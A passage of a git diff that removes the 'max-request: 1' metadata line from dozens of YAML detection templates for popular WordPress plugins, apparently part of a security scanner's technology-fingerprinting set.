info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 